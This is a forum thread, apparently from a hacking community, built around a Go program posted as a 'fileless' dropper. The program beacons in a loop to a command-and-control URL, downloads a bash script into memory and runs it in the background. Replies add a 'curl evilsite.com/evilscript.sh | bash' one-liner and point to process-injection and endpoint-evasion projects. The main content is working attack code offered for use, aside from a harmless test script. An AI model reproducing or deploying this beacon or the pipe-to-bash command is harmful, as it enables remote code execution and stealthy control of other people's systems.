[GoLang] Executing fileless scripts

Hi folks!

Some days ago I was wondering some new ideia to code in Go, and I had this idea: Something similar to powershell “DownloadString” but for Linux environment!

Its very simple, the code read you shellscript body from your C&C, keep it in memory (within a variable), then execute directly in bash.
I didn’t test deeply, did some basic tests, and worked.

package main

import (
    "io/ioutil"
    "net/http"
    "os/exec"
    "time"
)

func main() {
    for {
        url := "http://my_command_control:8080/executeThisScript" // Download your bash script
        resp, _ := http.Get(string(url))
        defer resp.Body.Close()

        shellScriptBody, _ := ioutil.ReadAll(resp.Body) // keep in memory

        cmd := exec.Command("/bin/bash", "-c", string(shellScriptBody))
        cmd.Start()                                                     // run in background

        time.Sleep(5000) // wait for the next beacoming
    }
}

Example of dumb shell to PoC:

#!/bin/bash

if [ ! -d /tmp/testDir ]; then
mkdir /tmp/testDir
fi

cd /tmp/testDir
touch test.sh
ifconfig > ifconfig.log
5 Likes

Well, it’s quite similar to execute system command from “@system(‘cmd’)” in PHP. It fits for windows and linux os. :sweat_smile:

yeah, its just a way to execute it in Go.
Instead PHP, Go can be compiled in ELF file, PHP cant be compiled ELF.
But what I coded, can be done in PHP also.

I think it a simple dropper

I’ve been seeing more malware samples written in Go, this post is making me think I need to check it out!

See also fileless-xec for a dropper in golang.

  • Does not write binary in memory
  • Supports HTTP3, ICMP, ~Cross-platform
  • Server and client mode

The difference is that it executes binary instead of shell command. But there is a hacky workaround (see

I don’t mean to bash (pun not intended), but how is this better/different than a simple: curl evilsite.com/evilscript.sh | bash ?

Nice, I think I’ll make good use of this in a red team sometime.

1 Like

Well, you can also inject to any other process and your payload will be used as a legitimate process.

This is the project :GitHub - Jhangju/goLang-injectors: This project will guide yout to awareness of injection in almost every window API and process.
This guy give demo and experiment : The art of defense evasion -part-2 — Endpoint evasion | by Osama Ellahi | Mar, 2022 | Medium

i had talked to a go evasion tool developer, he had mentioned golang provides it’s own syscalls. If anyone known/ can clarify on that I would greatly appreciate it.
an interesting link down that rabbit hole - golang.org/x/sys

1 Like

yes it is correct . We also used it.

1 Like

This topic was automatically closed after 121 days. New replies are no longer allowed.